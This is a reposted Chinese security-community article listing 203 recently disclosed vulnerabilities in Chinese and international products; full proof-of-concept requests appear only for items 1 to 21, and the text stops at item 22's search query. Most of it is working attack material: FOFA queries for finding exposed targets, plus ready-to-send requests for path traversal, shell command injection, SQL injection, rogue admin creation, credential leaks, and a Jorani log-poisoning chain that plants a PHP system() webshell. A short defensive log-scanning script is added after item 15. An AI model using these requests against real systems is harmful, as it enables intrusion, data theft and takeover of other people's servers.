Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29

道一安全 2024-06-05 07:41 Beijing
The following article originally appeared on 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of Nday vulnerabilities makes up a large share of real-world attack activity. This article is meant to help defenders: defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them were taken from other public accounts or websites on the Internet and were compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; for patches or remediation guidance, contact the product vendor.

Content: for length reasons, a few overly long PoCs are abbreviated with the placeholder PAYLOAD; search for the full PoC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the complete list; use your browser's find-in-page to search for keywords.

Bookmark this article if it is useful to you, or follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 (Kirisun) communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 navigation page file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical PACS (picture archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值 management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173.  Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection (duplicate of item 158)
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. FE (飞企互联) enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
Send the request line exactly as shown: a client that normalises ../ before sending (most browsers and some HTTP libraries do) collapses the path and the check passes for the wrong reason.
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Set password to the MD5 hash of the password you want the new account to have.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
The log value is passed to a shell, so ;whoami runs as an additional command.
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
The /./ in the file value is part of the PoC (presumably to get past a literal-string filter) and should be kept.
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
The PoC pulls the application's own database connection settings out of WEB-INF.
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default admin account, then send the request below. The stok value in the path and the sysauth cookie are the per-session values returned by that login, so both must be taken from your own login response. The injected command is the id after the 12:00; in wifiRebootrange.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoding of the following statement (encode it twice; a single encoding is not enough):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
The upload response contains the path of the stored file. The PoC uploads a plain-text marker (icfitnya.txt) to confirm the behaviour without dropping a webshell.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
Error-based check against MSSQL: the comparison 1=@@version forces a type-conversion error whose message contains the server version string.
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: request the login page to obtain the session and CSRF cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused in the following requests (the same value goes into the csrf_test_jorani form field):
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The login attempt, including the login value, ends up in the day's application log, and the language value traverses to application/logs so that log becomes reachable through /pages/view/ in the next step. The PHP planted in the login field runs the base64-decoded value of the K1SYJPMHLU4Z request header through system().
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: fetch the poisoned log through /pages/view/; the file name carries the date of the POST (here 2023-10-24, matching the Date header above). The K1SYJPMHLU4Z header carries the base64-encoded command: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= decodes to echo ---------;id 2>&1;echo ---------; so the output of id appears between two rows of dashes in the response.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
sFilePath is used as an absolute path; c:/windows/win.ini is the usual harmless test file on Windows hosts.
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. The ;.ico suffix is what makes the request reach the getAllList handler while looking like a static-resource request to a suffix-based access rule.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. This reaches the same getAllList handler as item 14, here through an a.ico/../ segment that is normalised away after the access check.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

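Added example (my code, not part of the original article or any vendor's software): a small Python checker that looks for the request paths of items 1 to 15 in web-server access logs, the kind of retrospective check the preface has in mind. Items 14 and 15 are the instructive part: /getAllList;.ico and /a.ico/../getAllList both reach /jshERP-boot/user/getAllList, and an exact match on the raw request line misses both. The checker therefore percent-decodes, drops ;param path segments and resolves .. before matching, and separately flags any request whose decoded path still contains .. (item 2's Casdoor request). The log lines, client addresses and timestamps are constructed for this example, the signature table is illustrative rather than complete, and the reading of how each product routes these paths is mine rather than something the article states.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Apache/Nginx combined log format: client ident user [time] "METHOD URI PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Endpoints copied from the PoCs above; keys are the path *after* normalise_path().
PATH_SIGNATURES = {
    "/mem_tracker": "StarRocks unauthenticated access (item 1)",
    "/api/v1/userlist": "EasyCVR userlist disclosure (item 3)",
    "/api/v1/adduser": "EasyCVR arbitrary user creation (item 4)",
    "/__debugging_center_utils___.php": "NUUO NVR command execution (item 5)",
    "/svpn_html/loadfile.php": "Sangfor NGAF file read (item 6)",
    "/808gps/MobileAction_downLoad.action": "鸿运 platform file download (item 7)",
    "/ioffice/prg/interface/ioFileDown.aspx": "红帆 iOffice file read (item 13)",
    "/jshERP-boot/user/getAllList": "jshERP getAllList disclosure (items 14, 15)",
}


def decode_path(raw_path, max_rounds=3):
    """Percent-decode until stable (bounded), so %2e%2e and double-encoded
    input end up the way a lenient backend would see them."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def normalise_path(raw_path):
    """Path the backend most plausibly routes on: decoded, with ';param' path
    parameters dropped from every segment (this turns '/getAllList;.ico' back
    into '/getAllList') and '.'/'..' segments resolved."""
    decoded = decode_path(raw_path)
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    norm = posixpath.normpath("/".join(segments))
    return norm if norm.startswith("/") else "/" + norm


def classify(uri):
    """Return a finding label for one request URI, or None if nothing matches."""
    raw_path = urlsplit(uri).path          # query string is not part of the route
    norm = normalise_path(raw_path)
    if norm in PATH_SIGNATURES:
        return PATH_SIGNATURES[norm]
    if ".." in decode_path(raw_path).split("/"):
        return "path traversal attempt resolving to %s (cf. item 2, Casdoor /static)" % norm
    return None


def scan_log(lines):
    """Run classify() over access-log lines; returns one dict per hit, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["uri"])
        if label:
            findings.append({"client": m["client"], "status": int(m["status"]),
                             "uri": m["uri"], "finding": label})
    return findings


# Constructed sample log (not real traffic); the request lines mirror the PoCs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:14:31:29 +0800] "GET /mem_tracker HTTP/1.1" 200 5120',
    '10.0.0.5 - - [05/Jun/2024:14:31:30 +0800] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1831',
    '10.0.0.6 - - [05/Jun/2024:14:31:31 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 9876',
    '10.0.0.6 - - [05/Jun/2024:14:31:32 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 9876',
    '10.0.0.7 - - [05/Jun/2024:14:31:33 +0800] "POST /api/v1/adduser HTTP/1.1" 200 35',
    '10.0.0.7 - - [05/Jun/2024:14:31:34 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 42',
    '10.0.0.8 - - [05/Jun/2024:14:31:35 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1831',
    '10.0.0.9 - - [05/Jun/2024:14:31:36 +0800] "GET /static/css/app.css HTTP/1.1" 200 7000',
    '10.0.0.9 - - [05/Jun/2024:14:31:37 +0800] "GET /%73tatic/..%2f..%2fetc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']:<10} {f['status']} {f['finding']:<60} {f['uri']}")
```

The 404 in the last sample line is kept on purpose: a rejected attempt is still worth seeing, and a reverse proxy that normalises paths before logging will not show the raw ;.ico or ../ forms at all, so run the check against the log closest to the application.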
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The expression injected through sorts calls HASHBYTES('MD5','1234') (MSSQL); a response that reflects the MD5 of 1234 confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
The netMarkings value is injected into the deleteBulletin SOAP operation; updatexml() raises an XPath error that carries md5(102103122) when the injection works.
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
Error-based MySQL injection in bean.RecId: EXTRACTVALUE() fails with an XPath error that contains the result of user().
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
fileUrl is given a file: URL rather than a plain path.
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
This is the widely used fastjson DNS-log probe (the same request as item 23 with a different DNS-log host). The body is deliberately not well-formed JSON; the stray "" after the inner object is part of the payload, so send it exactly as shown and watch for a DNS query from the target.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
